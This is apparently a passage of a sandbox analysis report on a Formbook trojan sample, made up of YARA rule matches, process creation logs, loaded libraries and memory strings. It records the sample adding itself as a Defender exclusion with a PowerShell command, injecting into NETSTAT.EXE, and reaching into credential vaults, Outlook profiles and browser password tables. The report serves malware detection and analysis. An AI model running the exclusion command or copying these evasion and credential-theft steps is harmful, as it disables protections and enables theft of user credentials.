            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_039BFCF211_2_039BFCF2
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03979C3211_2_03979C32
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_03051E1011_2_03051E10
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0304CF5011_2_0304CF50
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0304AFD011_2_0304AFD0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0304CD3011_2_0304CD30
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0304112111_2_03041121
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0305366911_2_03053669
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_030536B011_2_030536B0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_030554D011_2_030554D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0306BB2011_2_0306BB20
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0371E3A811_2_0371E3A8
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0372543411_2_03725434
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0371E4C311_2_0371E4C3
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0371E85D11_2_0371E85D
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0371D8C811_2_0371D8C8
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0397F290 appears 105 times
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 038EB970 appears 280 times
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 03947E54 appears 110 times
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0396EA12 appears 86 times
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 03935130 appears 58 times
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: String function: 0165EA12 appears 86 times
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: String function: 0166F290 appears 105 times
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: String function: 015DB970 appears 280 times
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: String function: 01625130 appears 58 times
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: String function: 01637E54 appears 110 times
            Source: NU1aAbSmCr.exe, 00000000.00000002.1349600533.0000000000CEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs NU1aAbSmCr.exe
            Source: NU1aAbSmCr.exe, 00000000.00000000.1338330768.00000000006BC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametTOn.exeD vs NU1aAbSmCr.exe
            Source: NU1aAbSmCr.exe, 00000000.00000002.1373866867.0000000007A30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs NU1aAbSmCr.exe
            Source: NU1aAbSmCr.exe, 00000004.00000002.1821360439.0000000001157000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs NU1aAbSmCr.exe
            Source: NU1aAbSmCr.exe, 00000004.00000002.1821551688.00000000016DD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs NU1aAbSmCr.exe
            Source: NU1aAbSmCr.exeBinary or memory string: OriginalFilenametTOn.exeD vs NU1aAbSmCr.exe
            Source: NU1aAbSmCr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 4.2.NU1aAbSmCr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 4.2.NU1aAbSmCr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.1824100351.0000000003450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000E.00000002.2583578419.00000000049B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.2580801626.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.2581282687.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.1822625318.0000000001950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: NU1aAbSmCr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, aAZly5Crsqfj1ghU4r.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, aAZly5Crsqfj1ghU4r.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, aAZly5Crsqfj1ghU4r.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, XWwa6bWsPleF4dvV8t.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, XWwa6bWsPleF4dvV8t.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, aAZly5Crsqfj1ghU4r.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, aAZly5Crsqfj1ghU4r.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, aAZly5Crsqfj1ghU4r.csSecurity API names: _0020.AddAccessRule
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/7@5/5
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NU1aAbSmCr.exe.logJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4344:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ixrxqhbp.4x5.ps1Jump to behavior
            Source: NU1aAbSmCr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: NU1aAbSmCr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: NETSTAT.EXE, 0000000B.00000003.2001188381.0000000003343000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000002.2579150975.0000000003364000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000003.2001296966.0000000003364000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000002.2579150975.0000000003391000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: NU1aAbSmCr.exeReversingLabs: Detection: 65%
            Source: unknownProcess created: C:\Users\user\Desktop\NU1aAbSmCr.exe "C:\Users\user\Desktop\NU1aAbSmCr.exe"
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NU1aAbSmCr.exe"
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess created: C:\Users\user\Desktop\NU1aAbSmCr.exe "C:\Users\user\Desktop\NU1aAbSmCr.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NU1aAbSmCr.exe"Jump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess created: C:\Users\user\Desktop\NU1aAbSmCr.exe "C:\Users\user\Desktop\NU1aAbSmCr.exe"Jump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"Jump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: snmpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: NU1aAbSmCr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: NU1aAbSmCr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: NU1aAbSmCr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: tTOn.pdbSHA256 source: NU1aAbSmCr.exe
            Source: Binary string: netstat.pdbGCTL source: NU1aAbSmCr.exe, 00000004.00000002.1821360439.0000000001157000.00000004.00000020.00020000.00000000.sdmp, mCFHCvdrqdDiDT.exe, 0000000A.00000002.2579923948.0000000001227000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netstat.pdb source: NU1aAbSmCr.exe, 00000004.00000002.1821360439.0000000001157000.00000004.00000020.00020000.00000000.sdmp, mCFHCvdrqdDiDT.exe, 0000000A.00000002.2579923948.0000000001227000.00000004.00000020.00020000.00000000.sdmp
